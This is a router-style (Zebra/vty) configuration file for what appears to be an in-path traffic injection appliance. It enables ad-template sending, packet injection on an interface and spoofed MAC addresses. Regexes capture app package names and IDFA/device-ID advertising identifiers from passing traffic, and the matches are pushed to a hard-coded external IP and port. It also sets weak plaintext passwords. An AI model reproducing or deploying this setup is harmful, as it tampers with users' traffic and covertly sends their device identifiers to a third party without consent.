!
! Zebra configuration saved from vty
!   2018-08-10 05:56:47
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
telnet port 2607
ad template load ad.template
ad template send single
adp dmac set 30:b4:9e:53:75:c6
adp smac set 24:6e:96:0c:8e:3c
adp interval 1
adp switch template  on
adp switch on
adp pkt-content eth
ori url add 2 pre-thinned[0-9]+.thinned\.signed\.dpkg\.ipa rpush appid 
ori url add 3 (idfa|device_id)=[a-zA-Z0-9]{8}-([0-9a-zA-Z]{4}-){3}[a-zA-Z0-9]{12} rpush idfa 
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
interface injection add em1
rpush sip enable
rpush sip set 192.168.1.10
rpush add 47.244.4.117 8201
!
line vty
!
